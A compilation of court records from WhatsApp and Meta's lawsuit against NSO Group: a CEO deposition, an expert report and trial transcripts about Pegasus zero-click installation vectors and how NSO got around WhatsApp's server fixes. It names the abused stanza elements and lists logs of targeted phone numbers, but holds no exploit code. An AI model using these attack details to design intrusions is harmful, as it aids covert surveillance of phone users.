A. I don't recall using "P2".

Q. Do you know -- strike that.

I think I am finished with that document. I will ask you if I want to refer you to it.

Thinking back to the 2018/19 time frame, did NSO provide customers the ability to choose which specific installation vector to use when trying to put Pegasus on a target device?

MR. AKROTIRIANAKIS: Objection. No foundation.

A. I don't recall what -- how do UI -- what UI allowed customers in 2018/19.

Q. I have seen distinctions between zero click or covert, and triggered or social engineering one click installation vectors generally. Do those terms make sense to you?

Page 67

A. Yes.

Q. Is it okay with you if I use covert and zero click interchangeably?

A. I prefer zero click in this context.

Q. Zero click, okay. And as to the alternative, social engineering, or triggered, or one click --

A. Triggered, one click.

Q. Sorry, let me just ask the question.

A. Sorry.

Q. As to the alternative, one click, social engineering, triggered; what do you prefer?

A. Let's stick with one click and zero click.

Q. Okay.

Aside from an option to choose between a zero click and a one click installation vector, are you aware of Pegasus ever providing a customer a choice of which zero click vector to use?

A. I am not aware such option was given.

Q. Okay. Do you know that such option was never given or you simply don't know whether or not it ever happened?

A. I would be very surprised if such option existed.

Q. Okay. So thinking back to your knowledge of the UI in 2018/19, you are not aware of that option having existed at that time?

A. I am not aware.

Page 68

Q. And thinking of your knowledge of the UI as it exists today, you have also never seen Pegasus give a customer an option to choose which zero click installation vector to use; right?

A. Correct.

Q. And that's been true consistently over the course of your time at NSO?

A. Yes.

Q. Why would you be surprised if Pegasus gave a customer an option to choose which zero click installation vector to use?

A. Because customers don't care which vector they use, as long as they get the intelligence they need.

Q. That's a matter for NSO and the system to take care of, not a matter for customers to operate?

A. Correct.

MR. AKROTIRIANAKIS: Objection. Vague. No foundation.

A. I said "correct".

Q. Okay. Thank you.

Have you seen the complaint in this lawsuit?

A. I don't recall.

Q. Do you understand that plaintiffs accuse defendants of being responsible for technology that used Whatsapp infrastructure as an installation vector for Pegasus, at least in the April to May 2019 timeframe?

Page 69

MR. AKROTIRIANAKIS: Objection. No foundation.

A. I understand that the complaint is about that timeframe. About, actually, an event that happened in, I believe, April 2019.

Q. Setting aside the question of whether it was the defendants themselves or the defendants' customers who operated the technology at issue, do you admit that NSO created the technology that was used to implement the attacks that the complaint describes?

MR. AKROTIRIANAKIS: Objection. Vague. No foundation.

A. NSO developed the technology that our customers are using.

Q. And that's the technology that was used in the events that the complaint in this lawsuit describes in April and May 2019; correct?

MR. AKROTIRIANAKIS: Objection. No foundation.

A. NSO developed the technology that was used in the event that the complaint refers to.

Q. Okay.

MR. AKROTIRIANAKIS: I am also going to object to the question as vague.

Q. As part of its Pegasus technology, NSO developed an installation vector called Heaven that uses Whatsapp signaling as part of a process that achieves zero click installation of the Pegasus endpoint on a mobile phone;

18 (Pages 66 - 69)

HIGHLY CONFIDENTIAL - ATTORNEYS EYES ONLY

Page 254

Q. Right, you were --

A. We became, we were brought in to the loop only after Francisco Partners and the potential acquired became agreed on the terms and they were about to conclude the transaction, only then we became aware that such presentations were conducted.

Q. You were asked a lot of questions, both numerically and time wise, about the P&L statements of WestBridge and involvement about any payments made to WestBridge, I think the question actually related to a decision that you were asked to make about whether or not to send the money to the company, do you remember that line of questions?

A. Yes, I remember.

Q. Okay. And in your answers to that, they were not really attached in time to any particular period, but are you able to say when it was at all that you became ever involved with, like, reviewing the P&L for WestBridge, or anything like that?

MR. BLOCK: I object to the form of the question and the coaching of the witness.

A. I became aware of it, of the request to make money transfers to WestBridge, only after I became CEO, which means all of my answers were for a period after August '22.

Page 255

Q. August 2022?

MR. BLOCK: Objection to form.

A. Yes. After August 2022.

Q. Okay. And you were asked a lot of questions about trips that you made to the United States, to Washington DC, with a stop over in New York, and meetings with, in DC, reporters, policymakers and service providers, do you recall that testimony?

MR. BLOCK: Objection to form.

A. Yes.

Q. When were those trips to Washington DC that you testified about in relation to you becoming the CEO of the company?

A. All of those trips to Washington were after August 2022.

MR. AKROTIRIANAKIS: Alright, thank you.

THE VIDEOGRAPHER: Going off the record. The time is 19:22. End of media card number 6 volume 1 and this is the end of the video deposition of Yaron Shohat.

(7:22 p.m.)

(Whereupon, the deposition concluded at 7:22 p.m.)

Page 256

CERTIFICATE OF COURT REPORTER

I, CHRIS LANG, an Accredited Real-time Reporter, hereby certify that the testimony of the witness YARON SHOHAT in the foregoing transcript, taken on this 29TH day of AUGUST, 2024 was recorded by me in machine shorthand and was thereafter transcribed by me; and that the foregoing transcript is a true and accurate verbatim record of the said testimony.

I further certify that I am not a relative, employee, counsel or financially involved with any of the parties to the within cause, nor am I an employee or relative of any counsel for the parties, nor am I in any way interested in the outcome of the within cause.

Name: CHRIS LANG

Date: 8/29/24

Page 257

CERTIFICATE OF DEPONENT

I, YARON SHOHAT, hereby certify that I have read the foregoing pages, numbered 1 through 259, of my deposition of testimony taken in these proceedings on 29TH, AUGUST, 2024 and, with the exception of the changes listed on the next page and/or corrections, if any, find them to be a true and accurate transcription thereof.

Signed: .......................

Name: YARON SHOHAT

Date: .......................

65 (Pages 254 - 257)

# EXHIBIT 25

## FILED UNDER SEAL

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

**UNITED STATES DISTRICT COURT**
**NORTHERN DISTRICT OF CALIFORNIA**

|  |  |  |
|---|---|---|
| WHATSAPP INC. and META PLATFORMS, INC.,<br><br>Plaintiffs,<br><br>v.<br><br>NSO GROUP TECHNOLOGIES LIMITED and Q CYBER TECHNOLOGIES LIMITED,<br><br>Defendants. | ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) | Case No. 19-cv-07123-PJH |

---

**EXPERT REPORT OF ANTHONY VANCE**

August 30, 2024

**HIGHLY CONFIDENTIAL – ATTORNEYS' EYES ONLY**

---

1

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

The team is working on a solution in top priority, hoping to provide a solution ASAP.

We will keep you updated.[28]

I know "Hummingbird" to be an umbrella name that NSO uses for the family of installation vectors that use WhatsApp, including the Heaven attack vector.[29] In my opinion, ▮▮▮▮▮▮▮ ▮▮▮▮▮▮▮▮▮▮ referring to the changes that WhatsApp implemented as part of the remediation described in "T33535414 - Malformed Whatsapp voip_settings."[30]

This remediation apparently impeded Defendants' ability to install Heaven and/or Hummingbird for some time. For example, on December 7, 2018, Josh Shaner a former employee of Westbridge Technologies, NSO's US sales affiliate,[31] sent a WhatsApp message to ▮▮▮▮▮ ▮▮▮▮▮

Hey man, is there any update on when heaven will be back online?

▮▮▮▮▮ responds:

Not yet
Hopefully by the end of next week[32]

The above NSO communications, which took place shortly after the remediation of the ""T33535414 - Malformed Whatsapp voip_settings" vulnerability establishes that WhatsApp's changes to the WhatsApp client application and WhatsApp servers prevented, restricted, or interrupted the operation of NSO malware prior to May 2019.

To further reinforce this point, Plaintiffs changes to WhatsApp server source code made to block malicious stanzas resulted in a "403" error code message that was sent to the attackers, providing notice that their access was forbidden. These error code messages are recorded in a log file on the Pegasus installation server (the AWS Server).

For example, I reviewed a change in the WhatsApp server code with a "Diff" number of D9650871, which was deployed in September 2018.[33] This code blocked call offer stanzas that attempted to set the "voip_settings" XML element, which legitimate WhatsApp clients would not do. After this change was implemented, any call offer stanza with a "voip_settings" XML element would be blocked by the WhatsApp server and an error code of "403" would be

---

[28] SHANER_WHATSAPP_00001098-SHANER_WHATSAPP_00001099.

[29] Eshkar Dep. Rough Draft, Aug. 27, 2024, at 124:23-125:11. On 6/12/2019, shortly after the May 2019 vulnerability was remediated, "Gilad" with the phone number 352691350209 sent a WhatsApp message to Josh Shaner and #30 other participants as follows: "Eden/ Heaven/ Hummingbird R.I.P announcement," equating or associating these products or code names. See SHANER_WHATSAPP_00001513.

[30] WA-NSO-00166464.

[31] Ibid., Eshkar Dep. Rough Draft, Aug. 27, 2024, at 77:19-22 ("Westbridge is an entity that could promote and sell NSO product."); NSO_WHATSAPP_00000176 (org chart showing Westbridge affiliation); Shohat Dep., Aug. 24, 2024, at 68:1-71:9.

[32] See SHANER_WHATSAPP_00001102.

[33] WA-NSO-00192815 (referencing D9650871, which was addressed in September 2018).

8

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

returned.



The fact that this 403 error code was received in response to an attempt to set the "voip_settings" XML element demonstrates that the D9650871 diff code change was successful in preventing, restricting, or interrupting the operation of NSO Malware.

Similarly, I reviewed another code change in the WhatsApp server code with a "Diff" number of D13309896 that was deployed in December 2018.[37] This code change was designed to block stanzas that attempted to set an XML "group_update" element, which legitimate WhatsApp clients would not do. After this change was implemented, any stanza with a "group_update" XML element would be blocked by the WhatsApp server and an error code of "403" would be returned.

---

[34] WA-NSO-00017140.

[35] Ibid., line 1167.

[36] Ibid., line 1170.

[37] WA-NSO-00192812: D13309896 (December 2018)

**SER-50**

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY



In response, the following acknowledgement (known as an "ACK" message) was received by the Pegasus installation server from the WhatsApp server containing a "403" code indicating that the message was forbidden (emphasis added):



Again, that this 403 "forbidden" error code was received in response to an attempt to set the "group_update" XML element demonstrates that the D13309896 diff code change was successful in preventing, restricting, or interrupting the operation of NSO Malware.

## VII.    Defendants intentionally circumvented WhatsApp's December 5, 2018 changes to the WhatsApp client application and WhatsApp servers prior to the May 2019 attacks

As noted in the previous section, WhatsApp's December 5, 2018 security update disrupted the operation of NSO malware. As also described in the previous section, on December 5, 2018, ▮▮▮▮▮▮▮▮▮ said in a WhatsApp group message that "WhatsApp had made changes in their servers that currently fail all installations and can cause crashes that risk the Hummingbird vector," but that "The team is working on a solution in top priority, hoping to provide a solution ASAP."[41] ▮▮▮▮▮▮▮▮ in a WhatsApp message to Josh Shaner said he expected NSO to bring "heaven" back online "Hopefully by the end of next week."[42] These communications show NSO's intention to circumvent the technological, code-based measures added to WhatsApp's

---

[38] WA-NSO-00017140.

[39] Ibid., line 4205.

[40] Ibid., line 4207.

[41] See SHANER_WHATSAPP_00001098.

[42] See SHANER_WHATSAPP_00001102.

10

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

servers so NSO could regain access to them again for purposes of installing Heaven and/or Hummingbird.

On February 4, 2019, "█████ sent a WhatsApp message to Josh Shaner and +30 other people:

> guys *Eden is back* and operational on sales 3! Thanks ████

███" responded:

> 👍 have fun

████████" replied:

> Starting internal demo: including Armageddon and Eden installations

> Both installation completed succesfuly [sic] 😃 thanks![43]

"Eden" is an upgraded version of Heaven, and like Heaven, is a covert or zero-click installation vector for NSO Malware that used WhatsApp.[44] These communications establish that at least by February 4th, Defendants were able once again to circumvent WhatsApp's December 5, 2018 updates or changes to the WhatsApp servers in order to carry out the attacks in May 2019 described in the complaint.

## VIII.   The May 2019 attacks described in the Complaint were conducted by NSO (d)

It is my opinion that the May 2019 attacks were performed using NSO malware. First, NSO's CEO, Yaron Shohat, admitted at his deposition that NSO malware was the source of the allegations in Plaintiffs' complaint.[45] This was verified in the malicious scripts observed in the May 2019 attack would cause target devices to retrieve additional malware from various third-party servers, one of which has been conclusively tied to NSO. As stated previously in Section VI, an Amazon Web Services (AWS) server was one of the third-party servers involved in the May 2019 attack (the "AWS Server"). Defendants have admitted that "[a]t certain times prior to January 2021, the AWS Server was being used by NSO's research and development department, to house computer code that **comprised part of the Pegasus system**" (emphasis added).[46]

Additionally, in a document produced by Amazon Web Services, the IP address assigned to the AWS Server (54.93.81.200) is shown to be assigned to NSO Technologies Group Ltd., with the "lease range" from "2018-12-06T14:52:02Z - Present".[47] Because the May 2019 attack involved a server under NSO's control that contained Heaven files, it is my expert opinion that the May

---

[43] SHANER_WHATSAPP_00001194– SHANER _WHATSAPP_00001196

[44] NSO_WHATSAPP_00008643 (describing another NSO malware called "Erised" as "a covert Android installation vector, replacing Eden (which replaced Heaven)"); see also SHANER_WHATSAPP_00001513, p. SHANER_WHATSAPP_00001513 ("Eden/ Heaven/ Hummingbird R.I.P announcement," equating or associating Eden with Heaven and Hummingbird).

[45] NSO's CEO Yaron Shohat has admitted "NSO develops the technology that was used in the event that the complaint refers to." Shohat Dep. Rough Draft, Aug. 24, 2024, at 169:17-18.

[46] See Decl. of Chaim Gelfand in Support , filed 7/15/2024.

[47] WA-NSO-00000121

11

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

2019 attacks were caused by Heaven, or very similar malware created by Defendants.

My opinion is confirmed by Defendants' internal response to WhatsApp's efforts to remediate those attacks. As explained further in Section XI below, Plaintiffs applied a software update to its relay servers on May 10, 2019, that blocked the attacks described in the complaint, but did not publicly disclose the incident until May 13, 2019 in connection with releasing an update to the WhatsApp client application. Yet, in a May 12, 2019 WhatsApp chat, NSO employees indicated they were already aware of the non-public server fix because it had stopped their exploit:

███████████  wrote:

> Eden will not work…

████" responded:

> Wont [sic] it still work with earlier WA versions?

████████  responded:

> No, per r&d they close vector from the server side .. [sic] so please don't try to install hummingbird[48]

In a separate WhatsApp message later that day, ████████ wrote, "I am sure most of you already heard about Eden," and confirmed "Eden has finished its duty with us as a patch was done on server side with the application it works with."[49]

As further evidence of NSO's involvement in the May 2019 attacks, on May 14, 2019 (four days after the server-side update was deployed) a WhatsApp exchange between ████████ (a/k/a ████████) and Facebook employee in Hebrew.[50] According to an English translation of the exchange, ████████ says to the Facebook employee (identified as "FB" in the translation):

████

> You just closed our biggest remote for cellular [Israeli slang for "mobile" - DM] today
> It's on the news all over the world

FB:

> Ah, I didn't know you were associated with that bro
> Do you work for NSO?

████

> I have always wondered if I can even talk to you hhh [Hebrew shorthand for "hahaha"]
> Good morning??? [Israeli slang for "obviously", in relation to the question of his

---

[48] SHANER_WHATSAPP_00001487 – SHANER_WHATSAPP_00001487.
[49] SHANER_WHATSAPP_00001489, at SHANER_WHATSAPP_00001490.
[50] WA-NSO-00016432.

12

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

employment at NSO - DM][51]

The exchange between NSO employee ████████████████████ and the Facebook employee is a clear admission of NSO's involvement in the May 2019 attack.

## IX.    Defendants used or tested NSO malware on WhatsApp servers and clients (e)

Evidence demonstrates that at least sixteen of the attacks (illustrated in the tables below) against the WhatsApp platform were conducted directly by employees of Defendants or their U.S. affiliate Westbridge Technologies.[52] On April 4, 2019, Josh Shaner sent a WhatsApp message to "NOC 2" ("NOC" stands for "network operations center" and was NSO's technical support[53]):

> Hey, I'm trying to install Eden on Sales 3. I received the group call, but it seems stuck at 1/4. Can you see what might be wrong? It's agent ID 3146

NOC 2 later responds:

> Phonenumber
>
> 12027655322

To which Shaner replies:

> Yup[54]

On May 9, 2019, at the time of the May 2019 attack, Shaner used WhatsApp to send a photo of a computer screen to "NOC 2" (Figure 1):

---

[51] WA-NSO-00016429

[52] *Defendants NSO Group Technologies Limited and Q Cyber Technologies Limited's Opposition to Plaintiffs' Motion for Issuance of a Letter Rogatory Pursuant to the Hague Convention*, (Dkt. 336) at 5: 3–5(explaining the ties of Mr. Shaner and Mr. DiVittorio to NSO affiliate Westbridge).

[53] *See, e.g.*, Eshkar Dep. Rough Draft, Aug. 27, 2024, at 142:11-23 (disclosing that "NOC" is "network operations center").

[54] SHANER_WHATSAPP_00001453.

13

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY



Figure 1. Photo of computer screen showing an installation status panel for Pegasus with the phone number "12027655322."[55]

As shown above, the image sent to NOC 2 had the words "Installation Status" at the top of the screen and showed phone number 12027645322 and the name "Steve Grover." In my opinion, the images showed an installation status panel for Pegasus.[56] The photo indicates that the "Installation Method" is "Covert," which is how Ramon Eshkar explained Pegasus's zero-click exploit appears to customers. Eshkar Dep. at 97:23-98:8 (explaining that "when a customer initiates an agent installation on Pegasus," "he will choose the vector that he is using. He will not like see the names, it will be like covert or other means.").

Continuing WhatsApp conversation, NOC 2 responded:

> Hi checking

---

[55] SHANER_WHATSAPP_00001486.
[56] The user interface from the screenshot is similar to the user interfaced demonstrated in Pegasus product descriptions such as WESTBRIDGE_WHATSAPP_00002330 at WESTBRIDGE_WHATSAPP_00002338.

14

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

> For how long have you experience this?

Shaner:

> The two install attempts today

Later in the exchange, NOC 2 asks:

> Are you trying HB?

Shaner:

> HB?

NOC 2:

> Hummingbird – Eden

Shaner:

> Yeah

NOC 2:

> The credentials are different for every enviorment [sic]
>
> Just talked with Yossi and he said he was aware of this
>
> It seems that Eden is currently isnt up on sales6

Shaner:

> Oh ok. All good
>
> I'll use Sales 3 for the demo

NOC 2:

> [57]

In the log of the May 2019 attack activity on WhatsApp servers, it is shown that phone numbers 35796286767, 35796287063, and 35796287063 were used to target a device using the same phone number of the device that Shaner stated he was attempting to attack: 12027655322.

| date | attacker | victim |
|---|---|---|
| 2019/05/09-06:46:43 | 35796286767 | 12027655322 |
| 2019/05/09-12:30:42 | 35796287063 | 12027655322 |

---

[57] SHANER_WHATSAPP_00001484–SHANER_WHATSAPP_00001485.

15

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

| 2019/05/09-12:31:55 | 35796287063 | 12027655322 |
| --- | --- | --- |

Similarly, two days earlier on May 7 at 12:10am (also during the period of the May 2019 attack), "███████ sent a WhatsApp message to a group of 55 recipients, including ████████ ██████████████████

> Hey, you can inatall [sic] eden now

Later in the exchange, ██████████ responds:

> Hi, I have a demo in Porsche at 24hs IL time.
>
> Will use Sales 3 for Eden.

████████ replies:

> hey ███████ FYI Eden is back on sales 6. so if you're planning on using that environment, you can do so with Eden as well[58]

Later at 7:28pm, ███████ sent a photo of a computer screen showing an installation status panel for Pegasus that displayed an "installation failed" message and phone number 51937742505 with the Peruvian country code +51 (Figure 2):

---

[58] SHANER_WHATSAPP_00001476.

16

**SER-57**

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY



Figure 2. Photo of computer screen showing an installation status panel for Pegasus for with the Peruvian phone number "51937742595."[59]

█████ replied:

Now it's ok[60]

The WhatsApp server log for May 6–7, 2019, Pacific Standard Time. shows that someone using phone numbers 35796287063, 35796012181, and 35796286767 targeted a device using the same phone number of the device that Martin states he was attempting to attack: 51937742505.

| date | attacker | victim |
|---|---|---|
| 2019/05/06-20:18:53 | 35796287063 | 51937742595 |
| 2019/05/07-12:50:36 | 35796012181 | 51937742595 |
| 2019/05/07-14:29:52 | 35796286767 | 51937742595 |

According to the messages exchanged between ████████████████████ was using the

---

[59] SHANER_WHATSAPP_00001478.
[60] SHANER_WHATSAPP_00001477–SHANER_WHATSAPP_00001477.

17

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

same "Sales 3" and "Sales 6" units for the demonstrations on May 7, 2019 that Josh Shaner used on May 9, 2019. Likewise, according to the WhatsApp server logs on May 6–7, 2019, phone numbers 35796287063 and 35796286767 were used to target a device using phone number 51937742505, which phone numbers match the phone numbers used to target the device using the phone number 12027655322 on May 9, 2019.

In addition, on April 15, 2019, someone using phone number ███████████ ███████████████████████████████████████████████████████ ██████████████████████████████████████████████████

> Team anyone available for a quick Q&A pls? I have a demo in under two hours and I'm stuck[61]

Nineteen hours later the same person sent the message:

> buenos dias team, could anyone tell me why my agents which were working fine yesterday will not communicate anymore?[62]

The same person then sent a photo of a computer screen showing an installation status panel for Pegasus that showed the status of various installations of NSO malware on victim devices (Figure 3):

---

[61] SHANER_WHATSAPP_00001411.
[62] SHANER_WHATSAPP_00001411, at SHANER_WHATSAPP_00001414.

18

HIGHLY CONFIDENTIAL – ATTORNEY EYES ONLY

/s/ Anthony Vance

August 30, 2024

29

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | | |
|---|---|---|
| WHATSAPP LLC AND META PLATFORMS, INC., | ) | C-19-07123 PJH |
| | ) | |
| | ) | OAKLAND, CALIFORNIA |
| PLAINTIFFS, | ) | |
| | ) | MAY 5, 2025 |
| VS. | ) | |
| | ) | VOLUME 6 |
| NSO GROUP TECHNOLOGIES LIMITED | ) | |
| AND Q CYBER TECHNOLOGIES | ) | PAGES 1176-1369 |
| LIMITED, | ) | |
| | ) | |
| DEFENDANTS. | ) | |
| | ) | |

TRANSCRIPT OF PROCEEDINGS
BEFORE THE HONORABLE PHYLLIS J. HAMILTON
UNITED STATES DISTRICT JUDGE

A P P E A R A N C E S:

FOR THE PLAINTIFFS:       DAVIS POLK & WARDWELL
                          BY:  GREG D. ANDRES
                               ANTONIO J. PEREZ
                          450 LEXINGTON AVENUE
                          NEW YORK, NEW YORK  10017

                          BY:  MICAH G. BLOCK
                          900 MIDDLEFIELD ROAD, SUITE 200
                          REDWOOD CITY, CALIFORNIA  94063

OFFICIAL COURT REPORTERS:    LEE-ANNE SHORTRIDGE, CSR, CRR
                             CERTIFICATE NUMBER 9595
                             IRENE RODRIGUEZ, CSR, RMR, CRR
                             CERTIFICATE NUMBER 8074

PROCEEDINGS RECORDED BY MECHANICAL STENOGRAPHY
TRANSCRIPT PRODUCED WITH COMPUTER

THEY DON'T JUST SELL THEM TO ANYBODY.

NOW, FACEBOOK SAYS THAT NSO IS EVIL BECAUSE IT LICENSES ITS TECHNOLOGY FOR PROFIT.

MR. WOOG TESTIFIED FACEBOOK IS, OF COURSE, ALSO A FOR-PROFIT COMPANY.  MR. WOOG AGREES, AS DO I THINK WE ALL, THAT A COMPANY DOESN'T HAVE BAD MOTIVES JUST BECAUSE IT SEEKS TO MAKE A PROFIT.

THAT IS NO LESS TRUE FOR NSO.

AGAIN AND AGAIN -- I DIDN'T TRY TO COUNT THIS MORNING -- FACEBOOK HAS CALLED PEGASUS SPYWARE.  SPYWARE.  SPYWARE. HACKING.  SPYWARE.

BUT YOU'VE NEVER HEARD ANYONE GIVE A DEFINITION OF SPYWARE, AND THAT'S BECAUSE FACEBOOK WANTS TO PUT A FALSE IMAGE IN YOUR HEAD.  THEY WANT YOU TO PICTURE A VILLAIN IN A BLACK HOODIE TRYING TO STEAL BANK ACCOUNT NUMBERS AND CREDIT CARD INFORMATION.

BUT THAT IMAGE BEARS NO RELATION TO THE REALITY OF WHAT NSO DOES.  MR. GAZNELI, IN FACT, TESTIFIED THAT PEGASUS DOESN'T EVEN HAVE THAT CAPABILITY.

AS YOU HEARD FROM MR. SHOHAT DURING FACEBOOK'S CROSS-EXAMINATION, THE TECHNOLOGY IS NOT DESIGNED FOR MASS SURVEILLANCE.

COUNSEL MADE REFERENCE TO THE TESTIMONY OF SARIT GIL, WHO YOU'LL RECALL IS THE ONE LADY WHO TESTIFIED ON THE -- BY WAY OF VIDEO DEPOSITION.  MS. GIL TESTIFIED THAT IT WASN'T EXACTLY HOW

CERTIFICATE OF REPORTERS

WE, THE UNDERSIGNED OFFICIAL COURT REPORTERS OF THE

UNITED STATES DISTRICT COURT FOR THE NORTHERN DISTRICT OF

CALIFORNIA, 280 SOUTH FIRST STREET, SAN JOSE, CALIFORNIA, DO

HEREBY CERTIFY:

THAT THE FOREGOING TRANSCRIPT, CERTIFICATE INCLUSIVE, IS

A CORRECT TRANSCRIPT FROM THE RECORD OF PROCEEDINGS IN THE

ABOVE-ENTITLED MATTER.

_____
IRENE RODRIGUEZ, CSR, CRR
CERTIFICATE NUMBER 8076

_____
LEE-ANNE SHORTRIDGE, CSR, CRR
CERTIFICATE NUMBER 9595

DATED:  MAY 5, 2025

**SER-63**

Case: 25-7380, 05/13/2026, DktEntry: 36.1, Page 64 of 157
Case 4:19-cv-07123-PJH    Document 753    Filed 06/05/25    Page 1 of 329

848

UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF CALIFORNIA

OAKLAND DIVISION

| | | |
|---|---|---|
| WHATSAPP LLC AND META PLATFORMS, INC., | ) | C-19-07123 PJH |
| | ) | |
| | ) | OAKLAND, CALIFORNIA |
| PLAINTIFFS, | ) | |
| | ) | MAY 2, 2025 |
| VS. | ) | |
| | ) | VOLUME 5 |
| NSO GROUP TECHNOLOGIES LIMITED | ) | |
| AND Q CYBER TECHNOLOGIES | ) | PAGES 848-1175 |
| LIMITED, | ) | |
| | ) | |
| DEFENDANTS. | ) | |
| _____ | ) | |

TRANSCRIPT OF PROCEEDINGS
BEFORE THE HONORABLE PHYLLIS J. HAMILTON
UNITED STATES DISTRICT JUDGE

A P P E A R A N C E S:

FOR THE PLAINTIFFS:    DAVIS POLK & WARDWELL
                       BY:  GREG D. ANDRES
                            ANTONIO J. PEREZ
                       450 LEXINGTON AVENUE
                       NEW YORK, NEW YORK  10017

                       BY:  MICAH G. BLOCK
                       900 MIDDLEFIELD ROAD, SUITE 200
                       REDWOOD CITY, CALIFORNIA  94063

OFFICIAL COURT REPORTERS:    LEE-ANNE SHORTRIDGE, CSR, CRR
                             CERTIFICATE NUMBER 9595
                             IRENE RODRIGUEZ, CSR, RMR, CRR
                             CERTIFICATE NUMBER 8074

PROCEEDINGS RECORDED BY MECHANICAL STENOGRAPHY
TRANSCRIPT PRODUCED WITH COMPUTER

Q.   AND SO YOU USED THOSE VECTORS FOR OTHER, LIKE, USED THEM FOR APPLE DEVICES, TOO?  YOU SAID THERE WERE OTHER VECTORS OUTSIDE OF PEGASUS, OR OUTSIDE OF WHATSAPP?

A.   PEGASUS CAN TARGET, CAN ALLOW GOVERNMENT AGENCIES TO TARGET ALSO IOS DEVICES, YES.

Q.   THAT'S APPLE DEVICES, WHEN YOU SAY IOS, APPLE?

A.   MY PRONUNCIATION OF APPLE WAS CONFUSING YESTERDAY, SO I'M USING IOS.

Q.   FAIR ENOUGH.  AND MY UNDERSTANDING OF COMPUTER SOFTWARE IS NOT AS GOOD AS YOURS.

A.   YES.

Q.   AND SO THEY KEEP GOING, THERE'S A FIX, AND YOU GO AGAIN TO FIND OUT A WAY AROUND THAT FIX LIKE YOU DID IN THIS CASE?

A.   WE FIND AN ALTERNATIVE WAY, NOT NECESSARILY AROUND THE FIX, BUT AN ALTERNATIVE WAY TO GET -- TO ALLOW THE TECHNOLOGY TO GET TO THE TARGET DEVICE, WHICH IS --

Q.   THE TECHNOLOGY HERE IS PEGASUS.  SO YOU FIND ANOTHER WAY TO GET PEGASUS ON THE PHONE?

A.   YES.

Q.   OKAY.  AND THAT HAPPENED ONCE IN THIS CASE, AND YOU HAD TO FIND A SECOND ALTERNATIVE.  FAIR?

A.   YES.

Q.   AND THEN IT HAPPENED A SECOND TIME AND YOU FOUND A THIRD ALTERNATIVE?

A.   YES, AS WE DISCUSSED.

Q.   AND PART OF THE $50-PLUS MILLION THAT'S USED FOR R&D IS FOR THIS PROCESS, TO FIND FIXES?  SOME PART OF THAT $52 MILLION IS TO FIND FIXES?

A.   WE DON'T FIND FIXES, WE FIND VECTORS, OR WAYS TO ACCESS THE PHONE.  BUT, YES, THE INTENTION IS THAT.

Q.   THAT'S WHAT THE R&D MONEY IS FOR?

A.   PART OF IT.

Q.   AND WHEN THESE FIXES GO IN OR THE SOFTWARE GOES TO THE PHONE, YOU USED THE WORD IN YOUR DEPOSITION THAT THERE'S FULL DENIABILITY; CORRECT?

A.   YES.  I MIGHT HAVE USED IT.

Q.   FULL DENIABILITY MEANS THAT THE PERSON WHOSE PHONE IS BEING SPIED UPON DOES NOT KNOW WHO'S SPYING ON THEM?

A.   THAT'S CORRECT.

Q.   THAT'S HARMFUL, ISN'T IT?

        MR. AKROTIRIANAKIS:  OBJECTION, YOUR HONOR.  IT'S, AGAIN, A LEGAL QUESTION.

        MR. ANDRES:  "HARM" IS NOT A LEGAL TERM, YOUR HONOR.

        THE COURT:  IN THIS -- IN THE SENSE THAT YOU'RE USING IT, IT'S -- ULTIMATELY IT'LL BE A JURY QUESTION AS TO WHETHER OR NOT IT'S HARM.

    SO I'M GOING TO SUSTAIN THE OBJECTION.

        MR. ANDRES:  THANK YOU, YOUR HONOR.

Q.   YESTERDAY YOU WERE LOOKING AT THE BALANCE SHEET, AND MR. AKROTIRIANAKIS WAS POINTING OUT THAT THERE'S APPROXIMATELY

YOUR HONOR.  IT'S PLAINTIFFS' EXHIBIT.

THE COURT:  PLAINTIFFS' EXHIBIT 35.

MR. AKROTIRIANAKIS:  YES.

THE COURT:  OKAY.

MR. AKROTIRIANAKIS:  MAY I PROCEED?

THE COURT:  YEAH.

BY MR. AKROTIRIANAKIS:

Q.   SO I DON'T KNOW IF I ASKED YOU, MR. GAZNELI, IF YOU SAW THAT THE DATE IS MAY 12TH OF THIS EXCHANGE OF MESSAGES?

A.   YES.

Q.   AND DO YOU KNOW RAMON ESHKAR?

A.   YES.

Q.   HE'S A COLLEAGUE OF YOURS?

A.   YES.

Q.   IN HIS MESSAGE ON MAY 12TH, 2019, MR. ESHKAR WRITES ABOUT WHATSAPP LATEST VERSION AND CHANGE IN THE SECOND LINE OF HIS MESSAGE.

A.   YES.

Q.   AND LATER IN HIS MESSAGE, HE TALKS ABOUT WHAT NSO IS GOING TO DO IN TERMS OF REMOVING THE VECTOR?

A.   YES.

Q.   MY QUESTION FOR YOU IS WHETHER THIS DATE, FEBRUARY -- MAY 12TH, 2019, WAS WHEN YOU CLOSED THE EDEN VECTOR?

A.   YES.

Q.   ALL RIGHT.  NOW, EARLIER IN YOUR TESTIMONY, YOU MENTIONED

SOMETHING ABOUT SERVERS HAVING RULES.

A.   YES.

Q.   CAN YOU EXPLAIN THAT CONCEPT?

A.   SO EACH SERVER IS A SPECIFIC PIECE OF CODE WHICH, IN DEVELOPING A PIECE OF CODE, YOU HAVE TO DEFINE SPECIFIC RULES THAT YOU WOULD LIKE THE SERVER TO WORK ACCORDINGLY.

SO THIS IS -- YEAH, THIS IS NORMAL PRACTICE IN SOFTWARE DEVELOPMENT.

Q.   OKAY.  IN THE WHATSAPP SERVERS THAT YOU WERE STUDYING, DID THE RULES OF THOSE SERVERS AT ANY POINT IN TIME CHANGE?

A.   YES.

Q.   ALL RIGHT.  SO I WANT TO TALK ABOUT THE FIRST TIME THAT THE SERVER RULES CHANGED.  OKAY?

WHEN WHATSAPP CHANGES ITS SERVER RULES, DOES IT SEND OUT, LIKE, A NOTICE OF CHANGE OF SERVER RULES OR SOME KIND OF EXPLANATION?

A.   NO.

